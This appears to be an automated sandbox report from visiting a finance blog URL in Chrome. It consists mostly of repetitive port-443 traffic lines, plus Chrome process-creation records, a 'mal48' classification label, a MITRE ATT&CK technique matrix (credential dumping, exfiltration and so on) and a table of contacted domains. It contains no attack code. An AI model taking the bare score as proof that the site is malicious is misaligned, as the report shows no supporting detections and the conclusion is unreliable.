Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: classification engineClassification label: mal48.win@19/326@80/29
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\Downloads\e035789e-ba0b-44d1-a42f-ad6aea344f1f.tmpJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1972,i,15189473384980414262,1618065118373367696,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alphaarchitect.com/2024/12/long-term-expected-returns/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1972,i,15189473384980414262,1618065118373367696,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
platform.twitter.map.fastly.net
199.232.168.157
truefalse
    high
    stats.g.doubleclick.net
    64.233.167.156
    truefalse
      high
      t.co
      162.159.140.229
      truefalse
        high
        idaas-ext.cph.liveintent.com
        3.225.89.177
        truefalse
          high
          www.google.com
          142.250.181.132
          truefalse
            high
            pluralism.themancav.com
            62.60.154.114
            truefalse
              high
              api2.hcaptcha.com
              104.19.229.21
              truefalse
                high
